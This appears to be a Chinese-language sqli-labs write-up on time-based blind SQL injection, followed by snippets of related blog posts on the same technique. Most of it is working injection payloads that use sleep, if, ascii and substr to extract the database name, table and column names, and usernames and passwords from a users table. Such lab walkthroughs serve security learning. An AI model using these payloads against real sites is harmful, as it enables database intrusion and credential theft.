顯示正常 you are in
該題與less-9非常相似,判斷id=1』 id=1」均無報錯
and 1=2 無報錯
既然無法通過頁面回顯判斷正誤,這裡我們考慮使用延時注入方法
』 and sleep(5) --+ 無報錯無延時
" and sleep(5) --+ 頁面重新整理延時5s
這裡判斷出存在延時注入
" and if(length(database())>5,1,sleep(5)) --+
第乙個字母:
" and if(ascii(substr(database(),1,1))>50,1,sleep(5)) --+
第乙個表名的第乙個字母:
" and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))>50,1,sleep(5)) --+
" and if(ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))>50,1,sleep(5)) --+
" and if(ascii(substr((select username from security.users limit 0,1),1,1))>50,1,sleep(5)) --+
" and if(ascii(substr((select password from security.users limit 0,1),1,1))>50,1,sleep(5)) --+
未完待續。。。
sqli labs Less 6(時間盲注)
時間盲注常用函式 sleep 延遲函式 if condition,true,false 條件語句 ascii 轉換成ascii碼 substring string strart,length mid 也一樣,取出字串裡的第幾位開始,長度多少的字元 1 判斷是否存在延時注入 當頁面延時返回時,代表存在...
延時盲注(一)
適用於,無法回現和無法顯示錯誤頁面的場景 我們看到介面,首先在url欄進行get傳參,但是沒有任何回顯,介面沒有變化 然後使用延時注入,這裡我們用到了資料庫裡的if語句 有點類似於三元運算,條件成立,就執行第二個,條件不成立就執行第三個。結果 12時網頁睡眠,可以判斷當前庫名有12個字元 結果 10...
2020 07 13 SQL盲注 延時注入
思路 判斷是否存在注入,注入是字元型還是數字型 猜解當前資料庫名 猜解資料庫表名 猜解欄位名 猜解資料 1判斷注入型別 payload result 1 and sleep 5 延遲 1 and sleep 5 沒有延遲 存在字元型注入 2猜解當前資料庫名 2.1猜解資料庫名的長度 payload ...